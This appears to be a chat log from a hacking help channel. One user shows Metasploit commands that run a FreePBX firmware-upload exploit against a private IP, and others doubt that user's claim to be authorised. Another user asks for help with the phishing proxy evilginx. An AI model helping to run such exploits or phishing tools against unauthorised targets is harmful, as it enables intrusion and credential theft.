msf exploit(unix/http/freepbx_firmware_file_upload) > set RHOST 10.0.0.11
RHOTS => 10.0.0.11
msf exploit(unix/http/freepbx_firmware_file_upload) > run

pure steeple
#

RHOTS => 10.0.0.11 Metasploit didn't make this typo

pure steeple
#

So you're not copy/pasting actual output?

wet eagle
#

also what should I do if it says "permission denied"? ๐Ÿค”

stuck ridge
soft pike
wet eagle
#

Okay

stuck ridge
#

And you def dont want to do that on your phone

stoic quarry
#

Ye

pure steeple
#

he said it's his home lab, but I have my doubts

soft pike
#

I run a freepbx server a security company that have a small call center for cs.

stoic quarry
#

Did one day of THM. Time to commit crimes - That guy ig

soft pike
#

I really appreciate help but if you guys cant help me for legal or ethical things I understand.

pure steeple
stuck ridge
#

"Oh, metasploit contains all the exploit???"

stoic quarry
soft pike
#

Im not taking anything, just asking for help cause dont know why I can run test

#

Thats all

#

Ty anyways

stoic quarry
#

A classic

chrome abyss
#

hi

#

i need help with evilgnix

stuck ridge
chrome abyss
#

evilginx is tool

wet eagle
#

I don't get it ๐Ÿ˜ข

chrome abyss
#

nmap from phone

wet eagle
#

yes

chrome abyss
#

dude you are crazy

wet eagle
#

why? What's wrong?

chrome abyss
#

nothing . its to hard for me

wet eagle
#

yeah, for me too, especially when nmap doesn't comply

#

๐Ÿ˜ข

chrome abyss
#

take trail chat gpt

#

use chat gpt cli

#

and talk with ai to help you ๐Ÿ˜‰

tame axle
wet eagle
#

i swear it worked before

tame axle
#

nope

chrome abyss
tame axle
wet eagle
#

Yeah!

#

Which I'm bad with :))

chrome abyss
#

wtf

#

omg dude wow hhahahaha

tame axle
wet eagle
#

but I'm doing everything right...

#

mobile is kinda tricky

kind linden
# wet eagle I don't get it ๐Ÿ˜ข

just ignore that warning. It says that , the Distro u trying to use mostly works with x64 structured processors but phones don't use those kind of processor so this warning occurs. Just ignore